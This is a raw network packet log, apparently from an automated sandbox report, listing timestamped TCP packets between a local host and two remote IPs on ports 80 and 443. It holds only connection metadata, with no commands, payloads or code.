Aug 23, 2022 03:42:49.573748112 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.573760986 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.573776960 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.573793888 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.573805094 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.573818922 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.573833942 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.573851109 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.573863029 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.573875904 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.573892117 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.573906898 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.573921919 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.573934078 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.573950052 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.573978901 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.573980093 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.574007034 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.574009895 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.574018002 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.574038982 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.574055910 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.574068069 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.574084044 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.574096918 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.574115038 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.574126959 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.574145079 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.574157953 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.574179888 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.574186087 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.574208975 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.574229956 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.710843086 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.711007118 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.724069118 CEST	49777	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:49.724112034 CEST	443	49777	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:49.724219084 CEST	49777	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:49.745105982 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.745131016 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.745147943 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.745166063 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.745187998 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.745209932 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.745215893 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.745233059 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.745253086 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.745266914 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.745270967 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.745292902 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.745295048 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.745313883 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.745321035 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.745343924 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.745352983 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.745364904 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.745369911 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.745389938 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.745390892 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.745403051 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.745413065 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.745433092 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.745440960 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.745465994 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.745476961 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.745481014 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.745498896 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.745520115 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.745663881 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.750159979 CEST	49777	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:49.750220060 CEST	443	49777	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:49.833374977 CEST	443	49777	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:49.833492994 CEST	49777	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:49.834218025 CEST	49777	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:49.834233046 CEST	443	49777	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:49.836194992 CEST	49777	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:49.836210966 CEST	443	49777	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:49.847656012 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.848050117 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.880943060 CEST	443	49777	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:49.881057024 CEST	443	49777	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:49.881086111 CEST	49777	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:49.881120920 CEST	49777	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:49.881740093 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.881814957 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.881851912 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.881880045 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.881891012 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.881928921 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.881947041 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.882014036 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.882020950 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.882077932 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.882097006 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.882127047 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.882143021 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.882189035 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.882204056 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.882250071 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.882260084 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.882318020 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.882320881 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.882364035 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.882374048 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.882427931 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.882441044 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.882474899 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.882483006 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.882528067 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.882536888 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.882580042 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.882596016 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.882642031 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.882652998 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.882700920 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.882714987 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.882764101 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.882775068 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.882821083 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.882834911 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.882879019 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.882895947 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.882941008 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.882951021 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.883002043 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.883007050 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.883052111 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.883064985 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.883107901 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.883119106 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.883162022 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.883174896 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.883224010 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.883232117 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.883275986 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.883285999 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.883328915 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.883730888 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.883790970 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.883800030 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.883838892 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.883850098 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.883896112 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.883910894 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.883971930 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.883975029 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.884015083 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.884016037 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.884069920 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.884077072 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.884138107 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.884186029 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.884206057 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.884211063 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.884232044 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.884241104 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.884282112 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.884289980 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.884336948 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.884337902 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.884382963 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.884387016 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.884428978 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.884435892 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.884471893 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.884474993 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.884516954 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.884519100 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.884555101 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.884571075 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.884596109 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.884598970 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.884643078 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.884644032 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.884680986 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.884685040 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.884726048 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.884738922 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.884768009 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.884787083 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.884828091 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.884836912 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.884870052 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.884874105 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.884908915 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.884915113 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.884948969 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.884952068 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.884989977 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.884995937 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.885029078 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.885035992 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.885068893 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.885072947 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.885149956 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.885201931 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.885266066 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.885309935 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.885343075 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.885353088 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.885370016 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.885371923 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.885423899 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.885425091 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.885469913 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.885473967 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.885514975 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.885515928 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.885564089 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.885571003 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.885616064 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.885617971 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.885662079 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.885672092 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.885718107 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.885737896 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.885786057 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.885793924 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.885834932 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.885838032 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.885878086 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.885878086 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.885921955 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.885927916 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.885966063 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.885982990 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.886028051 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.886044025 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.886090994 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.886106014 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.886148930 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.886166096 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.886209011 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.886226892 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.886271954 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.886290073 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.886333942 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.886334896 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.886375904 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.886379004 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.886416912 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.886420965 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.886457920 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.886465073 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.886497021 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.886502981 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.886537075 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.886542082 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.886579037 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.886579037 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.886620045 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.886620998 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.886661053 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.886662006 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.886701107 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.886704922 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.886742115 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.886740923 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.886781931 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.886785984 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.886821032 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.886823893 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.886861086 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.886863947 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.886900902 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.886904001 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.886940002 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.886943102 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.886981964 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.886989117 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.887022972 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.887025118 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.887063026 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.887064934 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.887104034 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.887104988 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.887144089 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.887151003 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.887183905 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.887185097 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.887224913 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.887231112 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.887283087 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.887284040 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.887327909 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.887335062 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.887404919 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.887420893 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.887480974 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.887538910 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.887556076 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.887603998 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.887604952 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.887646914 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.887655020 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.887687922 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.887701035 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.887747049 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.887754917 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.887797117 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.887800932 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.887836933 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.887837887 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.887876987 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.887918949 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.887953043 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.887955904 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.887990952 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.887995958 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.888012886 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.888036013 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.888051987 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.888076067 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.888079882 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.888115883 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.888118029 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.888164043 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.888171911 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.888209105 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.888212919 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.888252974 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.888289928 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.888292074 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.888309002 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.888331890 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.888343096 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.888371944 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.888375044 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.888411045 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.888427019 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.888452053 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.888456106 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.888490915 CEST	80	49774	45.95.11.158	192.168.2.3
